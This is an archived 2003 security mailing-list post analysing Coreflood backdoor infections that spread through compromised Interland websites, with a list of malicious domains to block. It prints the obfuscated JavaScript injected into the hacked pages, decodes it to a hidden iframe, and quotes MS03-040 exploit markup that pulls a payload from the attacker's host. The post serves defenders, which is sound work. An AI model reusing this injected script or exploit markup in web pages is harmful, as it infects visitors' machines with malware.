Security Incidents mailing list archives
RE: New Trojan
From: "James C. Slora, Jr." <james.slora () phra com>
Date: Thu, 30 Oct 2003 16:19:09 -0500
Rejected by the moderator last time I tried to post on this topic. New backdoor.coreflood infections today from the same name string. This time ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at 216.40.230.17 and vvv.goling2003.com at 216.40.230.17. wvw.goling2003.com was again the source of the infection. Downloads: http://vvv.goling2003.com:53/stop.bat http://vvv.goling2003.com:53/inf.ooo ftp.goling2003.com/ap216.exe (different type of log - URL may be incomplete) I DO think that the "goling" and "chinesenaming" strings are persistently relevant, and are not mere one-time distractions. Block *.goling.com *.goling2003.com *.chinesenaming.com Not a comprehensive list, but these are the ones I have seen repeatedly. IP addresses are irrelevant for blocking purposes. They have changed several times. There have been at least three mass compromises of Interland sites, and all three times the Coreflood author has redirected to sites with these types of names. The code changes, the exploit changes, and the IP addresses change - but he loves his aliases. They seem to be preferred signature strings of the author. Failing to find these strings in logs does not mean you are safe, but finding them gives you a reason to worry. Yet again today, a compromised Interland site redirected to the malware site. It appended the following script to the end of each page on the compromised site: <script type="text/javascript"> document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u 0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u 0077\u002e\u0067\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u 002e\u0063\u006f\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u 006d\u006c\u0020\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u 0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u 006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u 0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u 0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u 0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u 003e"); </script> IE is bright enough to run the script even though it comes after the </HTML> tag. The Unicode string is just ASCII expressed as Unicode. It converts to hex: %3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67 %6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20 %20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62 %6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61 %72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e Which converts to: <iframe src=http://wvw.goling2003.com/main.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe> Just your basic iframe, invoked by a script. But that page does use an exploit fixed in MS03-040 to force installation of arbitrary code: <span datasrc="#oa" datafld="ea" dataformatas="html"> </span> <xml id="oa"> <se> <ea> <![CDATA[ <object data="http://vvv.goling2003.com:53/inf.ooo" width=0 height=0> </object> ]]> </ea> </se> </xml>
-----Original Message----- From: James C. Slora, Jr. Sent: Monday, October 27, 2003 4:32 PM To: 'incidents () securityfocus com' Subject: RE: New Trojan John Tran wrote:Was this trojan discuss in Microsoft Security Bulletins?If so what numberor KB?Coreflood variants have been installed by visiting compromised Web sites using exploits fixed in MS03-040 and MS03-032. I'm sure there are many other vectors of infection. Visits to sites whose names contain the strings "chinesenaming" or "goling" are particularly suspect as sources of infection. These strings (and maybe others too) were used in redirects from hacked Interland sites in September and October. 216.247.117.225 was the most recent IP address I've seen associated with the hostile sites.
--------------------------------------------------------------------------- Network with over 10,000 of the brightest minds in information security at the largest, most highly-anticipated industry event of the year. Don't miss RSA Conference 2004! Choose from over 200 class sessions and see demos from more than 250 industry vendors. If your job touches security, you need to be here. Learn more or register at http://www.securityfocus.com/sponsor/RSA_incidents_031023 and use priority code SF4. ----------------------------------------------------------------------------
Current thread:
- Re: New Trojan, (continued)
- Re: New Trojan sean (Oct 25)
- Re: New Trojan Jay Castaldo (Oct 27)
- Re: New Trojan Damian Gerow (Oct 27)
- RE: New Trojan Chris Fussell (Oct 27)
- RE: New Trojan Tran, John (Oct 27)
- Re: New Trojan Damian Gerow (Oct 27)
- RE: New Trojan Matt Vaughan (Oct 28)
- Re: New Trojan Jay Castaldo (Oct 28)
- RE: New Trojan Thompson, Jason (Oct 28)
- RE: New Trojan David LeBlanc (Oct 28)
- RE: New Trojan James C. Slora, Jr. (Oct 31)